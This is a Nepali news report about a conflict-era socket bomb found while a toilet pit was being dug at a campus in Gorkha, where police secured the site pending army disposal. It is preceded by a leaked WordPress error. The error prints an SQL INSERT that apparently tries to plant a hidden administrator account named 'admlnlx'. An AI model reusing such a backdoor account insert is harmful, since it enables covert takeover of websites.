WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKH5kVODdchim.oGllCJ6mYwFfWTUZ/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 07:07:58', '', 'admlnlx', 'admlnlx')
गोरखा, माघ ७–
गोरखाको मसेल गाविस–९ स्थित दुल्लभ क्याम्पस परिसरमा शौचालय बनाउने खाल्डो खन्ने क्रममा सकेट बम फेला परेको छ ।
बिहीबार दिउँसो खाल्डो खन्ने क्रममा कामदारले तारसहितको बम देखेपछि प्रहरीलाई खबर गरेका हुन् । उक्त बम द्वन्द्वकालमा लुकाइएको हुनसक्ने प्रहरीले अनुमान गरेको छ ।
जिल्ला प्रहरी कार्यालय गोरखाका प्रहरी नायब उपरीक्षक वीरेन्द्र थापाका अनुसार बम फेला परेको स्थान सुरक्षित राखिएको छ । प्रहरीचौकी घ्याम्पेशालबाट खटिएका प्रहरीले बम रहेको स्थान सुरक्षित राखेका छन् ।
बम निष्क्रिय गर्न गोरखास्थित रणसिंह दल गणका नेपाली सेनालाई अनुरोध गरिएको र आज मात्रै बम डिस्पोज गर्ने प्रनाउ थापाले बताउनुभयो । अहिले क्याम्पस रहेको स्थानमा द्वन्द्वकालमा सेनाको ब्यारेक थियो ।
घटनास्थल सदरमुकामबाट ३० किमी टाढाको दूरीमा पर्छ । बम फेला परेपछि शौचालयको खाल्डो खन्ने काम रोकिएको बताइएको छ ।